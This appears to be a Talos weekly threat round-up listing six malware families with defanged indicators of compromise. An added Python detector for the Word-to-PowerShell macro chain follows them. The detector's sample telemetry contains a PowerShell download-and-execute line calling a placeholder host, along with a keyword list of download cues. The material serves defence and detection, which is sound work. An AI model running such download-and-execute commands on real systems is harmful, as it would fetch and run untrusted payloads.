Today, Talos is publishing a glimpse into the most prevalent threats we've observed between August 11 and August 18. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.
As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Detection and coverage for the following threats are subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your FireSIGHT Management Center, Snort.org, or ClamAV.net.
This week's most prevalent threats are:
- Doc.Downloader.Agent-6335676-0
  Office Macro Downloader
  This is an obfuscated Office Macro downloader that attempts to download a malicious payload executable. The execution chain is typically Word -> Shell function -> CMD -> PowerShell download and execute.
- Doc.Dropper.Agent-6335671-0
  Office Macro Downloader
  This is an obfuscated Office Macro downloader that attempts to download a malicious payload executable.
- Doc.Macro.JunkCode-6335442-0
  Office Macro
  Malicious Office Macros are obfuscated to prevent easy analysis. At times this results in no-operation-like instructions. These no-operation (junk) instructions create artifacts that can be detected.
- Win.Trojan.Expiro-6335658-0
  Trojan
  This sample is a Trojan. It complicates automated analysis and manual debugging by using anti-debug techniques. The sample needs a proper installation of the sandbox in order to run.
- Win.Trojan.Ovidiy-6333880-0
  Trojan
  Ovidiy, or Ovidiy Stealer, is a Windows trojan that is still under active development. It serves as a credential stealer. Although modular in nature, it mostly targets credentials from web browser sessions. It does include some C2 functionality and will beacon out with select host information. The trojan itself is written in a .NET language, and discovered samples are commonly protected with several packers specifically tailored to .NET binaries.
- Win.Trojan.Tinba-6333828-1
  Trojan
  Tinba is a tiny banking trojan primarily focused on stealing sensitive information from its victims via JavaScript injected into web browsers. The source code for Tinba was leaked in 2014, making it very easy for malware developers to adopt and modify its functionality.
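The Word -> Shell function -> CMD -> PowerShell execution chain described for the macro downloaders above is one of the more reliable things to alert on from endpoint telemetry. The following is an added example, not code from the Talos post, that walks the process tree in constructed Sysmon-style process-creation events; the record fields and the download-cue strings are assumptions of this example.

```python
# Added example (not from the Talos post): flag the Word -> cmd -> PowerShell chain
# from process-creation telemetry. The VBA Shell() call runs inside Word, so on the
# process tree the chain appears as winword.exe -> cmd.exe -> powershell.exe.
from dataclasses import dataclass

@dataclass
class ProcEvent:            # simplified Sysmon-style record; field names are assumptions
    pid: int
    ppid: int
    image: str              # executable name, e.g. "winword.exe"
    cmdline: str
# Expected ancestry, root first.
MACRO_CHAIN = ("winword.exe", "cmd.exe", "powershell.exe")
# Command-line fragments commonly seen in download-and-execute PowerShell (constructed list).
DOWNLOAD_CUES = ("downloadfile", "downloadstring", "invoke-webrequest", "start-process")

def ancestry(events, pid):
    """Return image names from the given process up to the root, child first."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:   # 'seen' guards against pid-reuse loops
        seen.add(pid)
        chain.append(by_pid[pid].image.lower())
        pid = by_pid[pid].ppid
    return chain

def find_macro_chains(events):
    """Return (pid, has_download_cue) for each PowerShell whose parents are cmd, then Word."""
    expected = list(reversed(MACRO_CHAIN))     # child-first order, to compare with ancestry()
    hits = []
    for e in events:
        if e.image.lower() != MACRO_CHAIN[-1]:
            continue
        if ancestry(events, e.pid)[:len(expected)] == expected:
            has_cue = any(c in e.cmdline.lower() for c in DOWNLOAD_CUES)
            hits.append((e.pid, has_cue))
    return hits

# Constructed sample telemetry: one benign PowerShell launch and one macro-style chain.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "WINWORD.EXE", '"WINWORD.EXE" /n invoice.doc'),
    ProcEvent(300, 200, "cmd.exe", "cmd /c powershell -w hidden -c <encoded command>"),
    ProcEvent(400, 300, "powershell.exe",
              "powershell -w hidden (New-Object Net.WebClient).DownloadFile('http://example.invalid/p.exe','p.exe')"),
    ProcEvent(500, 100, "powershell.exe", "powershell Get-Process"),
]

if __name__ == "__main__":
    for pid, cue in find_macro_chains(SAMPLE_EVENTS):
        print(f"pid {pid}: Word -> cmd -> PowerShell chain, download cue present: {cue}")
```

Only the strict winword -> cmd -> powershell lineage is matched; a macro that calls PowerShell directly, or through another intermediate, would need the chain tuple adjusted.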
Threats
Doc.Downloader.Agent-6335676-0
Indicators of Compromise
Registry Keys
- N/A
Mutexes
- N/A
IP Addresses
- 78[.]47[.]139[.]102
- 193[.]227[.]248[.]241
- 104[.]160[.]185[.]215
Domain Names
- campusassas[.]com
- campuslinne[.]com
Files and/or directories created
- %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\qdvjnh.bat
- %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\plzea.exe
File Hashes
- 7ffabe10f4147ce48fc9ae40cdc7778d08ac7881b779743720e2c4313592445b
- c2a3dcd915905c09026044e8da533455a2742196e4294cfffc000c048c1ea9cc
- f756ea3c00d7a3dc3ff1c0224add01e8189375a64fbcd5c97f551d64c80cbdba
Coverage
Screenshots of Detection: AMP, ThreatGrid, Umbrella
Doc.Dropper.Agent-6335671-0
Indicators of Compromise
Registry Keys
- N/A
Mutexes
- N/A
IP Addresses
- N/A
Domain Names
- iesimpianti[.]it
- janssen-st[.]de
Files and/or directories created
- %TEMP%\7E94\3F4A.bat
- %AppData%\Microsoft\Office\Recent\270700481.doc.LNK
- %AppData%\Microsoft\Office\Recent\fatt.348.LNK
- \Users\Administrator\Documents\20170810\PowerShell_transcript.PC.PbSYjzuP.20170810091133.txt
- %SystemDrive%\~$0700481.doc
- %AppData%\Microsoft\CHxRthlp\api-pntw.exe
- \TEMP\~$tt.348.doc
- %TEMP%\33513.exe
- %TEMP%\7E94\3F4A.tmp
- \TEMP\fatt.348.doc
File Hashes
Coverage
Screenshots of Detection: AMP, ThreatGrid, Umbrella
Doc.Macro.JunkCode-6335442-0
Indicators of Compromise
Registry Keys
- <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
  - Value: internat.exe
Mutexes
- Local\_!MSFTHISTORY!_
IP Addresses
- 52[.]173[.]193[.]166
- 185[.]206[.]144[.]152
- 190[.]107[.]177[.]115
Domain Names
- plantatulapiz[.]cl
- kalawatu[.]site
Files and/or directories created
- %TEMP%\CVRDF32.tmp.cvr
File Hashes
Coverage
Screenshots of Detection: AMP, ThreatGrid, Umbrella
Win.Trojan.Expiro-6335658-0
Indicators of Compromise
Registry Keys
- <HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC\PARAMETERS\PORTKEYWORDS\DHCP
  - Value: Collection
Mutexes
- N/A
IP Addresses
- N/A
Domain Names
- N/A
Files and/or directories created
- \TEMP\60d2422af917cb8aa58c14b8b78d4af112c9c78343da8f7aa3fbcb87be1a4de0.exe
File Hashes
- 60d2422af917cb8aa58c14b8b78d4af112c9c78343da8f7aa3fbcb87be1a4de0
- 5fd134b6abe1473fd5a7f96c711a4270fbc364bc6e3b10b5b344e0a1bfb0e4d8
- 5f5e9e5952765887211883b42e508b4b14c62a1685092978f98c6619229796b5
- 5fe205ea4f5f975703e242e8079dc471a5363538535d76584e7138ed3fb67546
- 5ffa0097ebcba0e1921c6607a644e2649532ae07b1c7d6533a3cbef52ee51620
Coverage
Screenshots of Detection: AMP, ThreatGrid
Win.Trojan.Ovidiy-6333880-0
Indicators of Compromise
Registry Keys
- <HKLM>\SOFTWARE\MICROSOFT\TRACING\6838BCE2F6C831414DF831040FC14287_RASAPI32
  - Value: EnableFileTracing
- <HKLM>\SOFTWARE\MICROSOFT\TRACING\6838BCE2F6C831414DF831040FC14287_RASMANCS
  - Value: ConsoleTracingMask
- <HKLM>\SOFTWARE\MICROSOFT\TRACING\6838BCE2F6C831414DF831040FC14287_RASAPI32
  - Value: EnableConsoleTracing
- <HKLM>\SOFTWARE\MICROSOFT\TRACING\6838BCE2F6C831414DF831040FC14287_RASAPI32
  - Value: FileTracingMask
- <HKLM>\Software\Microsoft\WBEM\CIMOM
- <HKCU>\Software\Microsoft\SystemCertificates\My
- <HKLM>\System\CurrentControlSet\Services\EventLog\System\Schannel
- <HKLM>\Software\Microsoft\SystemCertificates\CA
- <HKLM>\Software\Microsoft\SystemCertificates\Disallowed
- <HKLM>\Software\Microsoft\SystemCertificates\TrustedPeople
- <HKLM>\Software\Microsoft\SystemCertificates\trust
- <HKLM>\Software\Microsoft\Tracing\6838bce2f6c831414df831040fc14287_RASMANCS
Mutexes
- N/A
IP Addresses
- 104[.]27[.]132[.]79
- 104[.]27[.]133[.]79
Domain Names
- ovidiystealer[.]ru
Files and/or directories created
- N/A
File Hashes
- c16408967de0ca4d3a1d28530453e1c395a5166b469893f14c47fc6683033cb3
- 062bd1d88e7b5c08444de559961f68694a445bc69807f57aa4ac581c377bc432
- 22fc445798cd3481018c66b308af8545821b2f8f7f5a86133f562b362fc17a05
- 80d450ca5b01a086806855356611405b2c87b3822c0c1c38a118bca57d87c410
- 8f6939ac776dac54c2433b33386169b4d45cfea9b8eb59fef3b922d994313b71
Coverage
Screenshots of Detection: AMP, ThreatGrid, Umbrella
Win.Trojan.Tinba-6333828-1
Indicators of Compromise
Registry Keys
- HKU\Software\Microsoft\Windows\CurrentVersion\Run
Mutexes
- \BaseNamedObjects\5E60878D
IP Addresses
- N/A
Domain Names
- recdataoneveter[.]cc
Files and/or directories created
- %AppData%\5E60878D\bin.exe
File Hashes
Coverage
Screenshots of Detection: AMP, ThreatGrid, Umbrella